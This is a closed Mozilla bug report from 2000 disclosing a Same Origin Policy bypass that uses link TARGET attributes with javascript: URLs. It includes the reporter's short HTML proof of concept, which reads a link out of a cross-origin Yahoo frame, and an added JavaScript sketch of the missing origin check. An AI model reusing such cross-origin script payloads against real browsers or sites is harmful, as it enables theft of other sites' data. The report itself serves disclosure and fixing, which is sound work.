Closed Bug 31648 Opened 25 years ago Closed 25 years ago

links and TARGET vulnerability

Categories

(Core :: Security, defect, P3)

x86
Windows NT
defect

VERIFIED FIXED

People

(Reporter: norrisboyd, Assigned: norrisboyd)

Details

(Whiteboard: Fix in hand)

Subject: BUG: links and TARGET vulnerability
Date: Mon, 13 Mar 2000 16:03:28 +0200
From: Georgi Guninski <joro@nat.bg>
To: Norris Boyd <norris@netscape.com>

It is possible to circumvent Same Origin security policy using links and the TARGET attribute.
The problems are links like <A HREF="hostile" TARGET="victim"> which modify the location of the current window to hostile when clicked.
The code is:
---------------------------------------------------
Wait until the IFRAME is loaded:
<IFRAME SRC="http://www.yahoo.com"></IFRAME>
<BR>
<A HREF="http://www.yahoo.com" TARGET="a">Click me first</A>
<BR>
<A HREF="javascript:window.frames[0].alert(window.frames[0].document.links[0].href) " TARGET="a">Click me to see the first link from Yahoo</A>
---------------------------------------------------
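The check whose absence the report describes, as an added example that is not part of the bug report and is not Mozilla's fix: a javascript: URL aimed at another window may run only when the page containing the link has the same origin as the document already loaded in the target. The function names and the hostile.example URL are constructed for illustration.

```javascript
// Added model of the origin check (not Mozilla's patch). Function names and
// the hostile.example URL are constructed for illustration.

// Scheme of an href as the URL parser sees it: leading whitespace is stripped
// and case is folded, so " JaVaScRiPt:..." still comes back as "javascript:".
function schemeOf(href, baseUrl) {
  try {
    return new URL(href, baseUrl).protocol;
  } catch {
    return null; // unparsable href
  }
}

// Decide what a click on <A HREF=href TARGET=...> may do.
//   sourceUrl:    document that contains the link
//   targetDocUrl: document currently loaded in the window named by TARGET
function decideLinkClick(sourceUrl, href, targetDocUrl) {
  const scheme = schemeOf(href, sourceUrl);
  if (scheme === null) {
    return { action: 'block', reason: 'unparsable href' };
  }
  if (scheme !== 'javascript:') {
    // Ordinary navigation replaces the target's document; no script supplied
    // by the linking page runs against the old one.
    return { action: 'navigate', reason: 'ordinary URL' };
  }
  // A javascript: URL executes inside the target's current document, so the
  // linking page must share that document's origin (scheme, host, port).
  const sameOrigin = new URL(sourceUrl).origin === new URL(targetDocUrl).origin;
  return sameOrigin
    ? { action: 'run', reason: 'same origin' }
    : { action: 'block', reason: 'cross-origin javascript: URL' };
}

// The second link from the report, clicked after the first link has loaded
// Yahoo into window "a".
const reportHref =
  'javascript:window.frames[0].alert(window.frames[0].document.links[0].href) ';
console.log(decideLinkClick('http://hostile.example/poc.html', reportHref,
                            'http://www.yahoo.com/'));
```

Parsing the href with the URL parser instead of matching a string prefix is what keeps case and whitespace variants of the scheme from slipping past the check.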
Status: NEW → ASSIGNED
Target Milestone: M15
Keywords: beta2
Whiteboard: Fix in hand
Fixed.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
Keywords: nsbeta2
Opening fixed security bugs to the public.
Group: netscapeconfidential?
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?